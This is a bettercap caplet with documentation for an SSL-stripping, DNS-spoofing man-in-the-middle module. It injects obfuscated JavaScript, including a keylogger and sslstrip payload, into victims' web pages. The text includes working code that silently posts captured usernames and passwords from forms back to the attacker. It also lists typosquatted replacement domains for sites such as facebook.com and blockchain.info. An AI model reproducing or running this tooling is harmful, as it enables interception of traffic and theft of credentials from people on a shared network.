set drule.log /usr/local/share/bettercap/caplets/drule/ssl.log
set drule.ignore *
set drule.targets *.com, *.co.uk
set drule.replacements *.corn,*.cc.uk
#set drule.blockscripts facebook.com,*.facebook.com
set drule.obfuscate false
set drule.encode true
set drule.payloads *:/usr/local/share/bettercap/caplets/drule/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/drule/payloads/keylogger.js
set http.proxy.script /usr/local/share/bettercap/caplets/drule/drule.js
set dns.spoof.domains *.corn,*.cc.uk
http.proxy on
dns.spoof onThis module injects HTML & JS files with a payload that replaces targeted hostnames with spoofed ones, and communicates with bettercap, revealing all URLs that were discovered in the injected document.
When bettercap receives a callback with a new URL, it sends a HEAD request to learn whether the host in this URL sends HTTPS redirects, and keeps a log.
This is done so that bettercap can know whether it should MITM an SSL connection with a host, before the victim navigates to it.
You can also inject your own JavaScript payloads into HTML & JS files from specific hosts by assigning them to the drule.payloads variable.
Example:
drule.payloads *:drule/payloads/sslstrip.js,google.com:drule/payloads/google.js,*.google.com:drule/payloads/google.jsOnce the payload is injected into a page, you can technically phish any data unless the client navigates to a URL that either has strict transport security rules enforced by their browser, or the URL was not stripped due to JavaScript security.
sslstrip.js is included, which strips the s from all https instances in <a>, <form> and <iframe> elements.
By setting drule.obfuscate to true, any instance in your payloads beginning with obf_ will be obfuscated automatically.
Example:
function obf_function() {
alert("Random variable: obf_whatever_follows")
}
obf_function()Will be injected as:
function jfIleNwmKoa() {
alert("Random variable: AsjZnJW")
}
jfIleNwmKoa()Payloads can be injected in HTML documents using base64 encoded data URLs.
To enable payload encoding, set drule.encode to true.
You can write custom payloads that send data to bettercap without alerting the host.
Example of a silent callback:
form.onsubmit = function() {
req = new XMLHttpRequest()
req.open("POST", "http://" + location.host + "/obf_path_callback?username=" + username + "&password=" + password)
req.send()
}Note: Every instance of obf_path_callback will be replaced with the callback path, every instance of obf_path_whitelist will be replaced with the whitelist path, and every instance of obf_path_ssl_log will be replaced with the SSL log path.
The code above will send a POST request that will be sniffed by bettercap, but not proxied.
You can stop attacking a client on a certain host when you receive a request from that client for the whitelist path. The whitelist path will be inserted wherever you have obf_path_whitelist written in your payloads (/ will not be written).
Example of whitelisting callbacks:
// Whitelist multiple domains
form.onsubmit = function() {
// Whitelist current hostname and phish credentials
req = new XMLHttpRequest()
req.open("POST", "http://" + location.hostname + "/obf_path_whitelist?username=" + username + "&password=" + password)
req.send()
// Whitelist facebook
req = new XMLHttpRequest()
req.open("POST", "http://facedook.com/obf_path_whitelist")
req.send()
// Whitelist facebook CDN
req = new XMLHttpRequest()
req.open("POST", "http://static.xx.fdcdn.net/obf_path_whitelist")
req.send()
// Whitelist redirect to facebook
req = new XMLHttpRequest()
req.open("POST", "http://fd.com/obf_path_whitelist")
req.send()
}When the bettercap proxy receives such a request, it will stop attacking clients on the requested (original and spoofed) host(s). If a spoofed location is requested that was whitelisted, the client will then be redirected to the intended location.
Note that if the hostnames you are whitelisting are HSTS preloaded, you have to send the whitelist callback to the spoofed hostnames, otherwise the browser will enforce a HTTPS connection, and bettercap will not be able to intercept the requests.
In the caplet file you can block JavaScript on hosts by assigning them to the drule.blockscripts variable. (wildcard allowed)
If a host responds with a HTTPS redirect, the module saves this host in the SSL log, and bettercap will from then on spoof SSL connections for this host when possible.
In the caplet file you can assign comma separated domains to the drule.targets variable. (wildcard allowed)
For every hostname you assign to drule.targets you must assign a replacement domain to the drule.replacements variable.
Example:
set drule.targets *.com, blockchain.info,*.blockchain.info
set drule.replacements *.corn,blockchian.info,*.blockchian.infoYou can try to make them as unnoticeable or obvious as you like, but your options are limited here.